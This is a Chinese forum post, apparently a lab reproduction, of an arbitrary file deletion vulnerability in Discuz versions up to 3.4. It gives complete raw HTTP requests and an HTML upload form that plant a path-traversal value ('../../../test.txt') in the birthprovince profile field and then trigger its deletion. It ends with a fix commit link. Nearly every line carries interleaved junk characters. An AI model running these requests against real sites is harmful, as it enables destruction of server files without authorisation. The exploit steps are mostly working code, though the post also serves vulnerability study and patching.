|
|
. w1 R& V1 k3 V! i) w, z" s: S1 E! G5 I, [
前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。9 |+ p& f0 y0 S- E) A
影响版本:Discuz < =3.4 环境
4 l' l$ N9 X8 @, Z, N% u: e- c4 R+ y+ n8 z( C; h2 D% x6 X
复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。
3 F2 X: C, H* N; a9 D" z新建test.txt& a$ H+ q7 B* P* o" P
访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。7 H, z4 T+ T( V3 |) ~5 s. a! t$ j
9 L; r# G2 F% P3 i4 U' m
A! M0 i+ B% V Q p- r$ N4 J查看formhash
2 o# K- W1 ~/ f6 {利用burp抓包,获取cookie
6 t9 \$ m- c$ q( d# H# f; p+ _& V1 Q2 d" h f
0 U& q( T$ |3 N/ y( Z7 Q. ?( q
' Y$ p' A$ b) d7 q- K0 B7 {
$ w' K% ]) {- k1 D* n
" ?3 o3 d# a, p: T抓取cookie* ~" ^+ ?; Z( E O
" n+ Z9 D# J% k; S! d
发送下面数据包:修改cookie,formhash,还有删除的文件9 k$ U4 B/ i+ x% U% x, ~ k! J$ r
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.10 ^$ S3 J! L( T0 F) l; Q9 ]0 x
Host: localhost
8 p* ]3 U0 I! l2 V& |3 KContent-Length: 367
( C2 x, M9 A+ @" f2 T& hCache-Control: max-age=0# M7 s/ J7 P' }5 b6 ~" ^3 e& r
Upgrade-Insecure-Requests: 1% G+ v4 K" o( Q8 e- [9 ?& G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s1 c5 C2 ]2 ?8 {* V/ B. T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
2 e5 b# u7 L) G% f0 F, ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
( v j- |5 p/ NAccept-Encoding: gzip, deflate
3 G! D, [% G/ r1 O1 W* HAccept-Language: zh-CN,zh;q=0.8,en;q=0.6+ l, ] {6 [' ?3 A7 H- e
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056' K" ?3 G" S* ?0 |9 A# F
Connection: close
' @/ P+ V1 A4 W. F$ i w0 Z3 a------WebKitFormBoundaryPFvXyxL45f34L12s
0 A) D, r3 I* C) x- H1 o6 `8 bContent-Disposition: form-data; name="formhash"/ R, R1 w! s+ `+ ~0 P3 }
84a7f376 q k- F' d2 l+ N9 M0 u( O& k
------WebKitFormBoundaryPFvXyxL45f34L12s8 O9 w D) X# y
Content-Disposition: form-data; name="birthprovince"& D3 T6 v) ~( v% w8 v T U' G
../../../test.txt- M2 l5 {$ s, T3 n" v$ K
------WebKitFormBoundaryPFvXyxL45f34L12s
/ o$ q& l r% k1 P2 WContent-Disposition: form-data; name="profilesubmit"- N6 D- m$ |& g T5 ?7 E3 e
1
6 T0 f5 z) B; ~# ^ X, f------WebKitFormBoundaryPFvXyxL45f34L12s-- Q0 Q$ L- I0 L' ]
发送删除的数据包# y! p0 ^3 ?+ S5 n/ E F
刷新页面,查看出生地就会显示成下图所示的状态:/ X" c# t8 y) p& k6 W: F5 W
数据成功写入
3 L7 z: G& B( [. c# T5 L$ i
9 R4 N' K6 S8 \2 P' Q# K* n, _* k# H' F. t; g. i9 q! O
说明数据已经进入数据库:/ n& M4 ^2 P# K C0 z
然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:
$ m% L' ?0 w" {8 J1 g<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">4 \- Y0 @9 w' c# H
<input type="file"name="birthprovince" id="file" />
$ `' g' f1 |/ R9 f/ U<input type="text"name="formhash" value="84a7f376"/></p>8 t! ~1 d- ?0 r
<input type="text"name="profilesubmit" value="1"/></p>
* \$ h( w+ A9 w a<input type="submit"value="Submit" />
4 S& |9 j' Q0 ]1 w0 |# Z6 i</from>- c: \. ]! t0 _# w
. |# u H" S3 m* ^" Q. h. {: \* p1 X; n) ]# j- Q4 B5 @6 T' S" d; s
4 h- I+ o x5 T* A& j
0 ^' o9 X' n0 V
. w! g. c4 R# `4 t或者直接构建数据包:
' e6 n3 ~. ^* d6 MPOST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.18 O; Q0 |, s9 i5 T4 z7 A' V. B
Host: 192.168.220.131
) \# [ W) l4 T5 C0 i& t0 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.04 d( p, f5 V: |2 o' P0 h& c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
" e3 F. o7 F `( _9 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ l5 }8 r* E& S- m7 V8 VAccept-Encoding: gzip, deflate
6 o1 Q( y, Q6 F5 z* tContent-Type: multipart/form-data; boundary=---------------------------123821742118716
. Y. j- A3 O2 X& W! M* ]Content-Length: 91989
w; y/ U- l3 ]* Y1 {! hConnection: close8 W) {3 b: Z9 B' f: j1 r9 T& S
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C15779380562 y5 ]4 ]* ]! B
Upgrade-Insecure-Requests: 12 g/ c% X7 i/ p: U8 y
-----------------------------123821742118716
& t1 k: b4 ~+ c) W A: oContent-Disposition: form-data; name="birthprovince"; filename="0.jpg"" ?. a. o6 U8 Y+ o0 q! G. x
Content-Type: image/jpeg; Z9 R9 \+ x& t& H2 X
zerba(这里写啥都可以)) z7 g+ i9 W5 q$ ~* r' D# z7 F1 o
-----------------------------123821742118716--
7 _9 s4 e' P2 J% Z8 ]- D% W6 D
& b, m0 h& m& j* k
% B V" H5 P( q2 \; @/ b1 D, m& @4 w$ \4 ^
C! \8 S! K0 V2 b g% ~9 l4 B0 w
% }' I: w8 ?4 U- y
" ~$ U' _/ E- b+ q, u4 W. c' t' M
3 f: n8 k$ J: N
) ]1 r6 W- ]9 N, E5 L3 p
: q, m* L. o' D/ f2 ^+ g8 l7 {0 r. J& c7 X- j2 k0 i$ ]. f% L
: M% l X& r2 G- V
进去discuz看看,可以看到,test.txt文件已经被删除了。# j. L1 O) z% {( s; P( K# { L" i
. U. M% @4 t# p/ U
, K. h6 f% i. M+ D6 y3 S) n
( H7 d/ | |0 O, I- \4 l% A: {' d3 K" K! e. a+ E/ g
, [9 E1 }+ y& S* R, c8 R& x1 T3 ?
修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574( Y; E( p/ _3 O6 N. U( F
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。5 T0 P1 P) { w! \) N
" S, x6 B9 d; p' d
2 i. m5 |' D' D3 L3 [, H
( p9 B2 v; V* |$ @! Y! n1 q! C8 @; r: w0 E9 \) H. [* ^
% \4 A, O1 k* _& n( X
* [$ @ n F0 G* f1 S" u
) A; X" y$ e% V# ^. [) w4 S) l' W: A% ^) l) J
2 ?4 E9 k( x5 @: ]" x, h |
|
窥视卡
雷达卡
发表于 2022-6-25 08:59:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜